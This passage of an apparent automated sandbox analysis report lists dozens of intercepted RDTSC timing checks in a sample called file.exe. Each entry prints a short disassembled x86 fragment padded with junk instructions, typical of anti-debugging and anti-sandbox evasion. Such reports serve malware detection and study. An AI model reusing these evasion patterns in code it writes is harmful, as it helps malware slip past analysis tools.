Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA0A14 second address: CA0A21 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1BE4ECC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA0A21 second address: CA0A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BE47673D2h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F1BE47673C6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C41B second address: C7C423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C423 second address: C7C434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BE47673CCh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C434 second address: C7C439 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7C439 second address: C7C43F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB05E1 second address: CB05FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC073h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAF335 second address: CAF34A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1BE47673CBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAF34A second address: CAF34F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB0CF4 second address: CB0D2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007F1BE47673D7h 0x00000011 popad 0x00000012 popad 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB0D2A second address: CB0D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB0D2E second address: CB0D3D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB0D3D second address: CB0D43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB0D43 second address: CB0D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB548C second address: CB5492 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5492 second address: CB5496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5496 second address: CB549A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB549A second address: CB54A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5871 second address: CB5875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5875 second address: CB5897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BE47673CEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F1BE47673CEh 0x00000011 pushad 0x00000012 popad 0x00000013 jns 00007F1BE47673C6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5897 second address: CB589D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB589D second address: CB58A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB58A1 second address: CB58C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC076h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jc 00007F1BE4ECC066h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5B60 second address: CB5B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5B69 second address: CB5B6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5B6F second address: CB5B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5B73 second address: CB5BB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC075h 0x00000007 jmp 00007F1BE4ECC073h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F1BE4ECC074h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB790E second address: CB7912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7912 second address: CB7927 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC071h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB79CE second address: CB79D4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB79D4 second address: CB7A29 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jg 00007F1BE4ECC066h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 js 00007F1BE4ECC072h 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 push edi 0x0000001a jnc 00007F1BE4ECC066h 0x00000020 pop edi 0x00000021 js 00007F1BE4ECC07Eh 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push edi 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7A29 second address: CB7A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7A2D second address: CB7A63 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1BE4ECC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b pop eax 0x0000000c clc 0x0000000d call 00007F1BE4ECC069h 0x00000012 jmp 00007F1BE4ECC075h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a js 00007F1BE4ECC068h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7A63 second address: CB7A86 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1BE47673D5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7A86 second address: CB7A94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE4ECC06Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7D7F second address: CB7D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7D83 second address: CB7D91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F1BE4ECC06Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7F0B second address: CB7F11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7F11 second address: CB7F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7F15 second address: CB7F30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7F30 second address: CB7F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB868A second address: CB8690 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB8690 second address: CB869A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F1BE4ECC066h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB869A second address: CB86B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jc 00007F1BE47673C8h 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F1BE47673CBh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB8764 second address: CB876A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB876A second address: CB876F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB876F second address: CB8775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB8775 second address: CB8788 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F1BE47673D9h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBAD18 second address: CBAD34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE4ECC078h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9AD0 second address: CB9AD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9AD4 second address: CB9ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9ADA second address: CB9ADF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBB38D second address: CBB3A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE4ECC078h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBB3A9 second address: CBB3B9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBB3B9 second address: CBB3BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBDB74 second address: CBDB7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBDB7A second address: CBDB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBE69C second address: CBE70F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F1BE47673D9h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, dword ptr [ebp+122D2877h] 0x00000014 push 00000000h 0x00000016 jmp 00007F1BE47673D0h 0x0000001b push 00000000h 0x0000001d pushad 0x0000001e mov dword ptr [ebp+1246D7CDh], esi 0x00000024 sub dword ptr [ebp+122D5CC3h], ecx 0x0000002a popad 0x0000002b xchg eax, ebx 0x0000002c push eax 0x0000002d pushad 0x0000002e jne 00007F1BE47673C6h 0x00000034 jmp 00007F1BE47673D4h 0x00000039 popad 0x0000003a pop eax 0x0000003b push eax 0x0000003c push esi 0x0000003d push eax 0x0000003e push edx 0x0000003f jbe 00007F1BE47673C6h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBF02D second address: CBF032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBF032 second address: CBF037 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBF037 second address: CBF053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F1BE4ECC06Eh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBE3EF second address: CBE3F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBE3F3 second address: CBE3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBE3F9 second address: CBE42A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1BE47673D9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F1BE47673CEh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBFC42 second address: CBFC47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBFC47 second address: CBFC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F1BE47673C6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jbe 00007F1BE47673C6h 0x00000017 jmp 00007F1BE47673D8h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBFC77 second address: CBFC81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F1BE4ECC066h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBF937 second address: CBF967 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1BE47673CDh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F1BE47673D2h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC0535 second address: CC0543 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1BE4ECC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC6DB6 second address: CC6E19 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F1BE47673C8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 or edi, 6A9D861Bh 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F1BE47673C8h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 xor dword ptr [ebp+122D2892h], esi 0x0000004d push 00000000h 0x0000004f mov edi, eax 0x00000051 push eax 0x00000052 jnl 00007F1BE47673D0h 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC7EB5 second address: CC7EBF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1BE4ECC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8E84 second address: CC8E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8E88 second address: CC8E8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCBEDB second address: CCBF4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F1BE47673C8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F1BE47673C8h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 0000001Bh 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 push 00000000h 0x00000042 mov dword ptr [ebp+122D2E00h], ebx 0x00000048 mov dword ptr [ebp+122D2AD8h], eax 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F1BE47673CAh 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCCF58 second address: CCCF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCEF02 second address: CCEF60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F1BE47673D4h 0x0000000b nop 0x0000000c xor edi, dword ptr [ebp+122D2AC8h] 0x00000012 push 00000000h 0x00000014 movsx ebx, si 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F1BE47673C8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 mov ebx, edi 0x00000035 push eax 0x00000036 jl 00007F1BE47673D8h 0x0000003c push eax 0x0000003d push edx 0x0000003e jg 00007F1BE47673C6h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCFF9C second address: CCFFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD1FA0 second address: CD1FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1BE47673C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD1FAB second address: CD1FB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD1FB1 second address: CD1FB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD1FB5 second address: CD205E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007F1BE4ECC081h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F1BE4ECC068h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F1BE4ECC068h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 call 00007F1BE4ECC077h 0x0000004b mov bx, 56A1h 0x0000004f pop ebx 0x00000050 mov ebx, ecx 0x00000052 push 00000000h 0x00000054 xor bh, 00000001h 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F1BE4ECC072h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD205E second address: CD2064 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD41E0 second address: CD41E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD41E7 second address: CD4255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F1BE47673C8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000000h 0x00000024 movzx edi, ax 0x00000027 mov ebx, 7F9389E1h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F1BE47673C8h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 00000016h 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 mov edi, dword ptr [ebp+122D3B92h] 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F1BE47673D4h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD21E4 second address: CD21E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD3211 second address: CD3216 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
